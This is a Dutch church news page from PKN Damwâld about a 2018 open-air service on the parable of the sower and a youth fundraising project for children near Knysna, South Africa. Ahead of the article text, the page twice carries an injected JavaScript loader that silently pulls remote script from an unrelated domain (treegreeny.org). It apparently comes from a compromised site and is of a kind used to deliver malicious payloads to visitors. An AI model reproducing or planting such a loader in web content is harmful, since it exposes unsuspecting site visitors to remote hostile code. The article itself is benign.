;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 'Open Huis' in de open lucht ! - PKN Damwâld

‘Open Huis’ in de open lucht !

Gepubliceerd op: maandag 4 juni 2018

Afgelopen zondag hielden drie samenwerkende kerken in Damwâld (Gereformeerd/ Doopsgezind/Hervormd) een openluchtdienst met als thema: Open Huis. Een dienst van verbinding en ontmoeting. Zoals gebruikelijk werd deze gehouden op het oude parkeerterrein bij sporthal de Boppeslach. Een perfecte organisatie, een fijne opkomst en veel belangstelling. Het weer werkte goed mee en door de prachtige omgeving werd het letterlijk en figuurlijk dan ook een zeer aangenaam Open Huis. Ouderen, gezinnen met kinderen en jongeren: een veelkleurig gezelschap. Uiteraard met een gezellig kopje koffie bij de ingang. Onder leiding van gospelband Chosen uit Feanwâlden werd  -met verwijzing naar het Bijbelgedeelte Mattheüs 13 – met heerlijke muziek, prachtige (samen-) zang, een boeiende meditatie en een leuke sketch het verhaal van de zaaier op een inspirerende manier voor het voetlicht gebracht. Het zaad in deze gelijkenis staat namelijk voor het Woord van God, het prachtige evangelie dat Jezus Christus zelf de zaaier is: hij zaait in onze levens het Woord van zijn Vader. Maar is Hij ten diepste niet ook zelf het zaad? Het gaat erom dat het Woord van God, dat is Christus woont in ons hart, zodat ons leven door Hem vruchtbaar wordt.

Bovendien werd het ‘eindbedrag’ van het collectproject (‘het vroegere kwartjesproject’) onthult. Zoals bekend wordt er bij alle jeugdactiviteiten  een winterseizoen lang gecollecteerd voor een bijzonder project. Het collectproject dit seizoen was ‘Good News ZA’, waar met motivatie en passie aan de toekomst van de kinderen en jeugd wordt gebouwd in de plattelandsgebieden rondom Knysna, Zuid-Afrika. Good News ZA is opgericht in januari 2014 door Theo en Jinke de Jong. In december 2011 hebben ze het Friese platteland verlaten en zich als gezin gevestigd in Knysna, Zuid-Afrika. Theo heeft zijn baan als supermarktmanager in De Westereen opgegeven zodat zij zich in konden gaan zetten voor de arme bevolking in de sloppenwijken van Knysna. Na twee jaar bij een andere organisatie gewerkt te hebben heeft God hen duidelijk gemaakt dat zij fulltime kinder- en jeugdwerk moesten gaan doen.

Open Huis … en prachtig thema! Gastvrij zijn, je huis open zetten, mensen uitnodigen en meenemen om iets te delen van het koninkrijk van God. Het is een thema dat ons uitdaagt om uit onze eigen, bekende wereld te stappen en de ontmoeting te zoeken. Een mooie en uitdagende opdracht.